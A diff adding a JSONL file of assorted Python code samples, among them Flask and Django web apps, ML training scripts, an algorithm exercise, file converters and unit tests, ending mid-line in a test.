diff --git "a/2881.jsonl" "b/2881.jsonl" new file mode 100644--- /dev/null +++ "b/2881.jsonl" @@ -0,0 +1,739 @@ +{"seq_id":"307514439","text":"from flask import Flask, json, request\nfrom app.book.service import Service\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/books\", methods=[\"GET\"])\ndef list_books():\n return json_response(Service().find_books())\n\n\n@app.route(\"/books_by_genre\", methods=[\"GET\"])\n# listing books by the given genre\ndef list_books_by_genre():\n genre = request.args.get(\"genre\")\n return json_response(Service().find_books_by_genre(genre))\n\n\n@app.route(\"/search_by_name\", methods=[\"GET\"])\n# searching book by the given book name\ndef search_books_by_name():\n book_name = request.args.get(\"book_name\")\n return json_response(Service().search_books_by_keyword(book_name))\n\n\n@app.route('/add_new_book', methods=['POST'])\ndef add_book():\n book_id = request.args.get(\"book_id\")\n book_name = request.args.get(\"book_name\")\n author = request.args.get(\"author\")\n genre = request.args.get(\"genre\")\n book_obj = Service().create_book(book_id, book_name, author, genre)\n return json_response(book_obj)\n\n\n@app.route('/update_book', methods=['PUT'])\ndef update_book():\n book_id = request.args.get(\"book_id\")\n book_name = request.args.get(\"book_name\")\n author = request.args.get(\"author\")\n genre = request.args.get(\"genre\")\n book_obj = Service().update_book(book_id, book_name, author, genre)\n return json_response(book_obj)\n\n\n@app.route('/delete_book', methods=['DELETE'])\ndef delete():\n service = Service()\n book_id = request.args.get(\"book_id\")\n\n if service.delete_book(book_id):\n return json_response({'Result': 'Successfully Deleted'})\n else:\n return json_response({'Error': 'Book not found'}, 404)\n\n\ndef json_response(payload, status=200):\n # we returned all endpoints with this method to stabilize our format,\n # it will be consume by angular services in front-end 
side\n return json.dumps(payload), status, {'content-type': 'application/json'}\n","sub_path":"app/api/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16619750","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom flaskr.models.base_model import BaseModel\nfrom config import Config as config\n\nMODEL_TYPES = config.MODEL_TYPES\n\n\nclass RandomForest(BaseModel):\n def __init__(self, model_type=MODEL_TYPES[0], model_name=\"random_forest\", candle_size=60, market_info=None, train_daterange=None, lag=0, rolling_step=0, features=[\"close\", \"omlbct\"], label=\"omlbct\"):\n BaseModel.__init__(self,\n model_type=model_type,\n model_name=model_name,\n candle_size=candle_size,\n market_info=market_info,\n train_daterange=train_daterange,\n lag=lag,\n rolling_step=rolling_step,\n features=features,\n label=label)\n self.model = RandomForestClassifier(n_estimators=500)\n \n def train(self, x_train, y_train):\n self.model.fit(x_train, y_train)\n\n def predict(self, x_predict=np.array([])):\n return self.model.predict(x_predict)\n","sub_path":"flaskr/models/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"5769339","text":"\"\"\"\nQ042\nTrapping Rain Water\nHard\n09/29/2021\n\n:stack:two pointer:array: DP:\n\nGiven n non-negative integers representing an elevation map\nwhere the width of each bar is 1, compute how much water it\nis able to trap after raining.\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n # DP\n # pass\n total = 0\n left = [height[0]]\n right = [height[-1]]\n for i in range(1, len(height)):\n left.append(max(left[-1], height[i]))\n right.append(max(right[-1], 
height[len(height)-1-i]))\n\n right = right[::-1]\n\n for i in range(1, len(height)-1):\n total += max(0, min(left[i-1], right[i+1])-height[i])\n\n return total\n\n\n\na = [4,2,3]\na2 = [0,1,0,2,1,0,1,3,2,1,2,1]\nsol = Solution()\nprint(sol.trap(a2))\n\n\n\n\n","sub_path":"Q042-v4.py","file_name":"Q042-v4.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"80478647","text":"import json\nimport urllib.parse\nfrom http.client import HTTPConnection\nfrom typing import NamedTuple, Optional, Tuple\n\n\nclass Credentials(NamedTuple):\n username: str\n password: str\n\n\nAUTH_PATH = \"/login\"\n\n\nclass Communicator:\n \"\"\"Sends requests to an HTTP server.\"\"\"\n host: str\n port: int\n creds: Optional[Credentials]\n token: Optional[str]\n\n def __init__(self, host: str, port: int):\n self.host = host\n self.port = port\n self.creds = None\n self.token = None\n\n def authenticate(self) -> bool:\n \"\"\"\n Requests a new auth token.\n Returns True iff the authentication was successful.\n \"\"\"\n if self.creds is None:\n return False\n\n status, data = self.send_request(\n path=AUTH_PATH,\n method=\"POST\",\n data={\n \"username\": self.creds.username,\n \"password\": self.creds.password,\n },\n retry_auth=False,\n )\n\n if not 200 <= status < 300:\n return False\n\n self.token = data[\"token\"]\n return True\n\n def send_request(\n self,\n path: str,\n method: str,\n data: Optional[dict] = None,\n retry_auth=True,\n ) -> Tuple[int, dict]:\n \"\"\"\n Sends an HTTP request.\n\n Parameters\n ----------\n - path:\n The path of the request URL relative to the host.\n - method:\n The HTTP method of the request.\n - data (optional):\n The body of the HTTP request.\n\n Returns\n -------\n A tuple of HTTP status number and response body.\n \"\"\"\n path = urllib.parse.quote(path)\n\n try:\n conn = HTTPConnection(\n host=self.host,\n port=self.port,\n )\n params = {}\n\n if data is 
not None:\n params[\"body\"] = json.dumps(data)\n\n headers = {}\n\n if self.token is not None:\n headers[\"Auth-Token\"] = self.token\n\n conn.request(\n method=method,\n url=path,\n headers=headers,\n **params,\n )\n res = conn.getresponse()\n response_data = res.read()\n\n if res.status == 401 and retry_auth:\n # try to get a new token:\n\n if self.authenticate():\n return self.send_request(\n path=path,\n method=method,\n data=data,\n retry_auth=False,\n )\n\n return res.status, json.loads(response_data)\n finally:\n conn.close()\n","sub_path":"Client/communicator.py","file_name":"communicator.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"610264247","text":"#A neural netowrk with 2 hidden layers that is trained on the MNIST data\n\n#Construct the neural netowork:\nimport tensorflow as tf\n\nn_inputs = 28*28 #size of MNIST images\nn_hidden1 = 300 #number of nodes in first hidden layer\nn_hidden2 = 100 #Number of nodes in second hidden layer\nn_outputs = 10 #Number of outputs, one for each digit 1,..,10\n\nlearning_rate = 0.01\n\n#Create placeholder for the data - this functions as an input layer, and will be replaced by data during execution\nX = tf.placeholder(tf.float32, shape = (None,n_inputs), name = 'X')\ny = tf.placeholder(tf.int64, shape = (None), name = 'y')\n\n#Create two hidden layers and an output layer\n#The hidden layers use the ReLu actuivation function, the output layer uses the softmax activation\nhidden1 = tf.layers.dense(inputs=X, units=n_hidden1, activation=tf.nn.relu, name='hidden1')\nhidden2 = tf.layers.dense(inputs=hidden1, units=n_hidden2, activation=tf.nn.relu, name='hidden2')\noutputs = tf.layers.dense(inputs=hidden2, units=n_outputs, name='outputs')\n\n#Use cross entropy cost function.\n#Compute the cross-entropy for each example in a 1-D tensor. 
\n#This takes the outputs berofe the softmax function is applied (the logits), and applies the softmax itself\n#The function is more effient thaan appling the softmax activation and then computing the cross-entropy manually\nlosses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=outputs)\n#Compute the mean cross entropy over all examples\ncost = tf.reduce_mean(input_tensor=losses, name='cost')\n\n#define a GradientDescentOptimizer to update the model paramaters to minimize the cost funtion \noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(cost)\n\n#Evaluate the model using accuracy\n#Check if the highest logit corresponds to the true class for each example. Returns a 1-D tensor of boolean values\ncorrect = tf.nn.in_top_k(predictions=outputs, targets=y, k=1)\n#cast boolean values to floats, and compute their average\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) #This is the network's overall accuracy\n\n#Create an initializer to initialize all variables\ninit = tf.global_variables_initializer()\n\n#Run the neural netowrk on MNIST data:\nn_epochs = 40\nbatch_size = 50 #For mini batch Gradient Descent\n\n#Get the data and scale it (between 0 and 1)\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"'tmp'data/\")\n\nwith tf.Session() as sess: #Start a tensor flow session\n init.run() #run the init code that initializes all the variables\n for epoch in range(n_epochs):\n #The training loop:\n \n #Mini Batch GD:\n for iteration in range(mnist.train.num_examples//batch_size):\n X_batch, y_batch = mnist.train.next_batch(batch_size) #fetches each new mini-batch\n sess.run(training_op,feed_dict={X:X_batch, y:y_batch}) #feeds the current mini-batch to the network and runs the trainig operation\n train_acc = accuracy.eval(feed_dict={X:X_batch,y:y_batch}) #evaluated on the last mini-batch\n test_acc = 
accuracy.eval(feed_dict={X:mnist.test.images,y:mnist.test.labels}) #evaluated on the whole test ste\n\n# #Batch GD: \n# sess.run(training_op, feed_dict={X:mnist.train.images,y:mnist.train.labels}) #feeds the entire training set, an druns the training operation\n# train_acc = accuracy.eval(feed_dict={X:mnist.train.images,y:mnist.train.labels}) #evaluated on the whole training set\n# test_acc = accuracy.eval(feed_dict={X:mnist.test.images,y:mnist.test.labels}) #evaluated on the whole test set\n\n print(epoch, 'train accuracy: ', train_acc, 'test accuracy: ', test_acc)\n \n#Results:\n#Batch GD:\n#39 train accuracy: 0.39807272 test accuracy: 0.4119\n#Mini Batch GD: \n#39 train accuracy: 1.0 test accuracy: 0.9787\n \n\n \n","sub_path":"nn_TensorFlow_practice.py","file_name":"nn_TensorFlow_practice.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"366572074","text":"from time import sleep\nimport requests\nimport serial\n\n# Configuration\n# USB port - Adruino USB connection to PC\nusb_serial_port = \"COM3\"\n\n# Website host address\nhost= \"http://localhost/Water-Quality-Monitoring-System-Website/\" # End url with a slash '/'\n\nser = serial.Serial(usb_serial_port,9600)\nwhile True:\n\tgetVal = ser.readline()\n\tval = str(getVal).replace(\"b'\",\"\").replace(\"\\\\r\\\\n'\",\"\")\n\tarr = val.split(\",\")\n\tprint(arr)\n\n\t# send to web server (php)\n\tuserdata = {\"temperature\": arr[0], \"turbidity\": arr[1], \"ph\": arr[2]}\n\tresp = requests.post(host + \"insert_data.php\", params=userdata)","sub_path":"Water-Quality-Website/serialread.py","file_name":"serialread.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"212311788","text":"###########################################################################\n# TextIndexNG V 3 \n# The next generation TextIndex for 
Zope\n#\n# This software is governed by a license. See\n# LICENSE.txt for the terms of this license.\n###########################################################################\n\n\"\"\"\nA stupid HTML to Ascii converter\n\n$Id: sgml.py 2055 2009-03-14 10:13:45Z ajung $\n\"\"\"\n\nimport re\nimport sys\nfrom zopyx.txng3.core.baseconverter import BaseConverter\nfrom StripTagParser import StripTagParser\nfrom entities import convert_entities\n\ndefault_encoding = sys.getdefaultencoding()\nencoding_reg = re.compile('encoding=\"(.*?)\"')\n\nclass Converter(BaseConverter):\n\n content_type = ('text/sgml', 'text/xml')\n content_description = \"SGML, XML\"\n\n def convert(self, doc):\n \"\"\"Convert html data to raw text\"\"\"\n\n p = StripTagParser()\n p.feed(doc)\n p.close()\n return str(p)\n\n def convert(self, doc, encoding, mimetype,\n logError=False, raiseException=False):\n\n # Use encoding from XML preamble if present\n mo = encoding_reg.search(doc)\n if mo:\n encoding = mo.group(1)\n\n if not encoding:\n encoding = default_encoding\n \n if not isinstance(doc, unicode):\n doc = unicode(doc, encoding, 'replace')\n doc = convert_entities(doc)\n doc = doc.encode('utf-8')\n p = StripTagParser()\n p.feed(doc)\n p.close()\n return str(p), 'utf-8'\n\nSGMLConverter = Converter()\n","sub_path":"zopyx/txng3/core/converters/sgml.py","file_name":"sgml.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300156430","text":"from PIL import Image\r\n\r\n# ascii characters used\r\nascii_chars = [\"@\", \"#\", \"$\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \".\"]\r\n\r\n\r\n# resizing the image\r\ndef resize_image(image, new_width=25):\r\n width, height = image.size\r\n ratio = height / width\r\n new_height = int(new_width * ratio)\r\n resized_image = image.resize((new_width, new_height))\r\n return (resized_image)\r\n\r\n\r\n# converting image into greyscale\r\ndef 
grayscale(image):\r\n grayscale_image = image.convert(\"L\")\r\n return (grayscale_image)\r\n\r\n\r\n# convert each pixel into a corresponding ASCII Character\r\ndef pixels_to_ascii(image):\r\n pixels = image.getdata()\r\n characters = \"\".join([ascii_chars[pixel // 25] for pixel in pixels])\r\n return (characters)\r\n\r\n\r\ndef main(new_width=25):\r\n # take the image from the user\r\n path = input('Enter a valid pathname to the image: ')\r\n try:\r\n image = Image.open(path)\r\n except:\r\n print(path, 'is not a valid pathname to the image')\r\n\r\n# convert image into ascii\r\n new_image_data = pixels_to_ascii(grayscale(resize_image(image)))\r\n\r\n# format\r\n pixel_count = len(new_image_data)\r\n ascii_image = '\\n'.join(new_image_data[i:(i + new_width)] for i in range(0, pixel_count, new_width))\r\n\r\n# print result\r\n print(ascii_image)\r\n\r\n# save result to a txt file\r\n with open(\"ascii_image.txt\",\"w\") as f:\r\n f.write(ascii_image)\r\n\r\nmain()\r\n","sub_path":"ASCII art.py","file_name":"ASCII art.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"637930388","text":"import csv\nimport os.path\nimport sys\nimport glob\n\ndirname = str(sys.argv[1])\nfor filename in glob.glob(dirname + '*.csv'):\n htmlname = os.path.splitext(os.path.dirname(filename))[0] + \"/html/\" + os.path.splitext(os.path.basename(filename))[0] + \"_v2.html\"\n basename = os.path.splitext(os.path.basename(filename))[0]\n\n csvFile = open(filename)\n csvReader = csv.reader(csvFile)\n csvData = list(csvReader)\n\n with open(htmlname, 'w') as html:\n html.write('\\r')\n #html.write('
\\r')\n #html.write('

' + basename + '

\\r

Decriptive Text

\\r')\n html.write('
\\r\\r')\n\n r = 0\n for row in csvData:\n print(row)\n if r == 0:\n print(\"FIRST ROW\")\n html.write('\\r\\r')\n for col in row:\n html.write('\\r')\n html.write('\\r\\r')\n html.write('\\r')\n else:\n html.write('\\r')\n c = 0\n for col in row:\n if c == 0:\n html.write('\\r')\n else:\n html.write('\\r')\n c += 1\n\n html.write('\\r')\n\n r += 1\n\n html.write('\\r
' + col + '
' + col + '' + col + '
\\r
\\r\\r')\n #html.write('
\\r\\r')\n html.write('\\r')\n","sub_path":"columbia-igem-master/py/csv_to_bootstrap.py","file_name":"csv_to_bootstrap.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631004093","text":"#maria francisca gutierrez hernandez 24/09/19\r\n\r\n#Leer un archivo externo\r\n'''file=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n print(item)\r\nfile.close()'''\r\n\r\n\r\n#eliminar lineas\r\n'''file=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n item=item.strip()\r\n print(item)\r\nfile.close()'''\r\n\r\n#copiar en una lista\r\n'''devices=[]\r\nfile=open(\"devices.txt\",\"r\")\r\nfor item in file:\r\n item=item.strip()\r\n devices.append(item)\r\nfile.close()\r\nprint(devices)'''\r\n\r\n#agregar dispositivos\r\nfile = open(\"devices.txt\", \"a\")\r\nwhile True:\r\n newItem = input(\"Ingrese el nombre del dispositivo, si desea salir escriba (salir):\")\r\n if newItem == \"salir\":\r\n print(\"¡Todo listo!\")\r\n break\r\n file.write(newItem + \"\\n\")\r\nfile.close()\r\n\r\n","sub_path":"unidad_1/actividad_7/07_file-access_maria-francisca-gh.py","file_name":"07_file-access_maria-francisca-gh.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640201514","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom scipy.stats import entropy\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport torch.utils.data\nfrom torchvision import transforms\nfrom torchvision.models.inception import inception_v3\n\nimport os.path\nimport scipy.misc\n# from torchsummary import summary\n\n\ndef preprocess(img):\n # print('img', img.shape, img.max(), img.min())\n # img = Image.fromarray(img, 'RGB')\n if len(img.shape) == 2:\n img = 
np.resize(img, (img.shape[0], img.shape[1], 3))\n img = scipy.misc.imresize(img, (299, 299, 3),\n interp='bilinear')\n img = img.astype(np.float32)\n # [0, 255] --> [0, 1] --> [-1, 1]\n img = img / 127.5 - 1.\n img = np.moveaxis(img,-1,0)\n # print('img', img.shape, img.max(), img.min())\n return img\n\n\ndef load_data(fullpath):\n print(fullpath)\n images = []\n for path, subdirs, files in os.walk(fullpath):\n for name in files:\n if name.rfind('jpg') != -1 or name.rfind('png') != -1:\n filename = os.path.join(path, name)\n # print('filename', filename)\n # print('path', path, '\\nname', name)\n # print('filename', filename)\n if os.path.isfile(filename):\n img = scipy.misc.imread(filename)\n img = preprocess(img)\n images.append(img)\n print('images', len(images), images[0].shape)\n return images\n\n\ndef inception_score(imgs, cuda=True, batch_size=32, resize=False, splits=10):\n \"\"\"Computes the inception score of the generated images imgs\n\n imgs -- Torch dataset of (3xHxW) numpy images normalized in the range [-1, 1]\n cuda -- whether or not to run on GPU\n batch_size -- batch size for feeding into Inception v3\n splits -- number of splits\n \"\"\"\n N = len(imgs)\n\n assert batch_size > 0\n assert N > batch_size\n\n # Set up dtype\n if cuda:\n dtype = torch.cuda.FloatTensor\n else:\n if torch.cuda.is_available():\n print(\"WARNING: You have a CUDA device, so you should probably set cuda=True\")\n dtype = torch.FloatTensor\n\n # Set up dataloader\n dataloader = torch.utils.data.DataLoader(imgs, batch_size=batch_size)\n\n # Load inception model\n inception_model = inception_v3(pretrained=True, transform_input=False).type(dtype)\n inception_model.eval();\n up = nn.Upsample(size=(299, 299), mode='bilinear').type(dtype)\n def get_pred(x):\n if resize:\n x = up(x)\n x = inception_model(x)\n return F.softmax(x).data.cpu().numpy()\n\n # Get predictions\n preds = np.zeros((N, 1000))\n\n for i, batch in enumerate(dataloader, 0):\n batch = batch.type(dtype)\n batchv 
= Variable(batch)\n batch_size_i = batch.size()[0]\n\n preds[i*batch_size:i*batch_size + batch_size_i] = get_pred(batchv)\n\n # Now compute the mean kl-div\n split_scores = []\n\n for k in range(splits):\n part = preds[k * (N // splits): (k+1) * (N // splits), :]\n py = np.mean(part, axis=0)\n scores = []\n for i in range(part.shape[0]):\n pyx = part[i, :]\n scores.append(entropy(pyx, py))\n split_scores.append(np.exp(np.mean(scores)))\n\n return np.mean(split_scores), np.std(split_scores)\n\n\nif __name__ == '__main__':\n num_classes = 50 + 1 # number of classes\n fullpath = \"results/output/oxford_2019_02_21_11_20_08\"\n\n images = load_data(fullpath)\n\n print(inception_score(images))\n","sub_path":"inception_score.py","file_name":"inception_score.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597317950","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom ikwen.flatpages.views import FlatPageView\n\nfrom blog.views import PostsList, PostDetails, save_comment, Search, AdminHome, PostPerCategory, get_media, delete_photo\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^(?P[-\\w]+)/$', PostDetails.as_view(), name='details'),\n url(r'^search$', Search.as_view(), name='search'),\n url(r'^category/(?P[-\\w]+)/$', PostPerCategory.as_view(), name='post_per_category'),\n url(r'^yommax/$', AdminHome.as_view(), name='admin_home'),\n url(r'^$', PostsList.as_view(), name='home'),\n url(r'^save_comment$', save_comment, name='save_comment'),\n url(r'^get_media$', get_media, name='get_media'),\n url(r'^delete_photo$', delete_photo, name='delete_photo'),\n)","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192314243","text":"import models\nimport 
views\nimport flask\n\nfrom controllers import Paginator\nfrom controllers.auth import current_user\n\nbp = flask.Blueprint(__name__, 'reviews')\n\n\n@bp.route('/film/')\ndef list_by_film(id_):\n user = current_user()\n if user is None:\n return flask.Response(status=401)\n pag = Paginator()\n query = models.Review.query.filter_by(film=id_)\n query = pag.apply(query)\n lst = [\n views.review.view(model)\n for model in query\n ]\n return flask.jsonify(\n pag.wrap({\n 'reviews': lst\n })\n )\n\n\n@bp.route('/film/', methods=['POST'])\ndef review_film(id_):\n user = current_user()\n if user is None:\n return flask.Response(status=401)\n text = flask.request.values['text']\n review = models.Review(user.id, id_, text)\n models.db.session.add(review)\n models.db.session.commit()\n return flask.jsonify(views.review.view(review))\n","sub_path":"lab2/controllers/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279425142","text":"import unittest\nimport logging\nfrom collector.requesting import InvocationRequest\nfrom collector.requesting import Target\nfrom collector.requesting import SpaceName\nfrom collector.triggers import Find\nfrom collector.triggers import FetchAttribute\nfrom collector.triggers import RetrieveTags\nfrom collector.triggers import TagType\nfrom collector.triggers import SelectElement\nfrom collector.triggers import SetWorkspace\nfrom collector.executing import ExecutionOrderEntry\nfrom collector.executing import ExecutionOrder\nfrom collector.executing import InfoCollector\nfrom collector.helpers import configure_logging\nfrom collector.helpers import decode_base64\nfrom collector.helpers import get_web_space\nfrom collector.helpers import fetch_html\nfrom collector.helpers import get_entry_for_dobreprogramy_pl\n\nconfigure_logging(r\"../test_log.txt\")\nlogging.debug(\"Tests for: Blizzard Battle.net\")\n\n\nclass 
BlizzardBattleNetTestData:\n APP_NAME = \"Blizzard Battle.net\"\n WEB_SPACE_URL_1 = \"https://eu.battle.net/account/download/\"\n WEB_SPACE_URL_2 = \"https://www.dobreprogramy.pl/Blizzard-Battle.net,Program,Windows,99372.html\"\n WEB_SPACE_URL_3 = \"https://www.dobreprogramy.pl/Blizzard-Battle.net,Program,Mac,99373.html\"\n WEB_SPACE_HTML_PATH_1 = r\"../resources/battleNet_web_URL.base64\"\n WEB_SPACE_HTML_PATH_2 = r\"../resources/battleNet_web_Windows.base64\"\n WEB_SPACE_HTML_PATH_3 = r\"../resources/battleNet_web_Mac.base64\"\n\n def __init__(self):\n self.execution_order = ExecutionOrder()\n self.execution_order.add_entry(get_entry_1(), True)\n self.execution_order.add_entry(get_entry_2(), True)\n self.execution_order.add_entry(get_entry_3(), True)\n self.execution_order.add_entry(get_entry_4(), True)\n win_exe_engb = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPXdpbiZhbXA7bG9jYWx' \\\n b'lPWVuR0ImYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n win_exe_plpl = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPXdpbiZhbXA7bG9jYWx' \\\n b'lPXBsUEwmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n mac_zip_enus = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPW1hYyZhbXA7bG9jYWx' \\\n b'lPWVuVVMmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n mac_zip_plpl = b'aHR0cHM6Ly93d3cuYmF0dGxlLm5ldC9kb3dubG9hZC9nZXRJbnN0YWxsZXJGb3JHYW1lP29zPW1hYyZhbXA7bG9jYWx' \\\n b'lPXBsUEwmYW1wO3ZlcnNpb249TElWRSZhbXA7Z2FtZVByb2dyYW09QkFUVExFTkVUX0FQUA=='\n self.expected_win_exe_engb = decode_base64(win_exe_engb)\n self.expected_win_exe_plpl = decode_base64(win_exe_plpl)\n self.expected_mac_zip_enus = decode_base64(mac_zip_enus)\n self.expected_mac_zip_plpl = decode_base64(mac_zip_plpl)\n self.expected_win_ver = decode_base64(b'MS4xNi4w')\n self.expected_win_date = decode_base64(b'MjAxOS0wMi0wOA==')\n self.expected_win_size = 
decode_base64(b'NCw0OSBNQg==')\n self.expected_mac_ver = str()\n self.expected_mac_date = decode_base64(b'MjAxOC0xMi0zMQ==')\n self.expected_mac_size = decode_base64(b'MywwMSBNQg==')\n\n\nclass TestDataOnline(BlizzardBattleNetTestData):\n def __init__(self):\n super().__init__()\n self.execution_order.list[0].html_data = fetch_html(self.WEB_SPACE_URL_1)\n self.execution_order.list[1].html_data = fetch_html(self.WEB_SPACE_URL_2)\n self.execution_order.list[2].html_data = fetch_html(self.WEB_SPACE_URL_3)\n\n\ndef get_entry_1():\n req_01 = InvocationRequest(Target(SpaceName.WEB), Find(\"gameProgram[bnetapp]\"))\n req_02 = InvocationRequest(Target(SpaceName.WORK), RetrieveTags(\"a\", TagType.ATTRIBUTED, 28))\n req_03 = InvocationRequest(Target(SpaceName.LIST), SelectElement(3))\n req_04 = InvocationRequest(Target(SpaceName.WORK, True, \"Win_exe_enGB\"), FetchAttribute(\"href\"))\n req_05 = InvocationRequest(Target(SpaceName.LIST), SelectElement(10))\n req_06 = InvocationRequest(Target(SpaceName.WORK, True, \"Win_exe_plPL\"), FetchAttribute(\"href\"))\n req_07 = InvocationRequest(Target(SpaceName.LIST), SelectElement(14))\n req_08 = InvocationRequest(Target(SpaceName.WORK, True, \"Mac_zip_enUS\"), FetchAttribute(\"href\"))\n req_09 = InvocationRequest(Target(SpaceName.LIST), SelectElement(24))\n req_10 = InvocationRequest(Target(SpaceName.WORK, True, \"Mac_zip_plPL\"), FetchAttribute(\"href\"))\n chain_request_1 = (req_01, req_02, req_03, req_04, req_05, req_06, req_07, req_08, req_09, req_10)\n entry_1 = ExecutionOrderEntry(chain_request_1, get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_1))\n return entry_1\n\n\ndef get_entry_2():\n web_space = get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_2)\n return get_entry_for_dobreprogramy_pl(web_space, \"Win_ver\", \"Win_date\", \"Win_size\")\n\n\ndef get_entry_3():\n web_space = get_web_space(BlizzardBattleNetTestData.WEB_SPACE_HTML_PATH_3)\n return get_entry_for_dobreprogramy_pl(web_space, 
\"Mac_ver\", \"Mac_date\", \"Mac_size\", (-1, -1))\n\n\ndef get_entry_4():\n app_website = BlizzardBattleNetTestData.WEB_SPACE_URL_1\n req_1 = InvocationRequest(Target(SpaceName.WORK, True, \"app_website\"), SetWorkspace(app_website))\n chain_request = (req_1,)\n return ExecutionOrderEntry(chain_request, str())\n\n\nclass ActivisionBlizzardBattleNetTest(unittest.TestCase):\n def test_package_collecting(self):\n # given\n dt = BlizzardBattleNetTestData()\n collector = InfoCollector(dt.APP_NAME, dt.execution_order)\n\n # when\n collector.collect()\n\n # then\n self.assertEqual(dt.APP_NAME, collector.get_app_name())\n self.assertEqual(dt.expected_win_exe_engb, collector.get_collectibles()['Win_exe_enGB'])\n self.assertEqual(dt.expected_win_exe_plpl, collector.get_collectibles()['Win_exe_plPL'])\n self.assertEqual(dt.expected_mac_zip_enus, collector.get_collectibles()['Mac_zip_enUS'])\n self.assertEqual(dt.expected_mac_zip_plpl, collector.get_collectibles()['Mac_zip_plPL'])\n self.assertEqual(dt.expected_win_ver, collector.get_collectibles()['Win_ver'])\n self.assertEqual(dt.expected_win_date, collector.get_collectibles()['Win_date'])\n self.assertEqual(dt.expected_win_size, collector.get_collectibles()['Win_size'])\n self.assertEqual(dt.expected_mac_ver, collector.get_collectibles()['Mac_ver'])\n self.assertEqual(dt.expected_mac_date, collector.get_collectibles()['Mac_date'])\n self.assertEqual(dt.expected_mac_size, collector.get_collectibles()['Mac_size'])\n self.assertEqual(dt.WEB_SPACE_URL_1, collector.get_collectibles()['app_website'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"collector/tests/executing/app_blizzard_battle_net_test.py","file_name":"app_blizzard_battle_net_test.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"464307712","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom opwen_email_server.api import 
client_read\nfrom tests.opwen_email_server.api.api_test_base import AuthTestMixin\n\n\nclass DownloadTests(TestCase, AuthTestMixin):\n def test_denies_unknown_client(self):\n with self.given_clients(client_read, {'client1': 'bar.com'}):\n message, status = client_read.download('unknown')\n self.assertEqual(status, 403)\n\n @patch.object(client_read, 'server_datastore')\n @patch.object(client_read, 'STORAGE')\n def test_uploads_emails_and_marks_as_delivered(\n self, storage_mock, datastore_mock):\n\n with self.given_clients(client_read, {'client1': 'bar.com'}):\n resource_id = '1234'\n emails = [{'to': 'foo@bar.com', '_uid': '1'},\n {'to': 'bar@bar.com', '_uid': '2'}]\n self.given_index(datastore_mock, storage_mock, emails, resource_id)\n\n response = client_read.download('client1')\n\n self.assertEqual(resource_id, response.get('resource_id'))\n self.assertEqual(self.stored_ids, emails)\n datastore_mock.mark_emails_as_delivered.\\\n 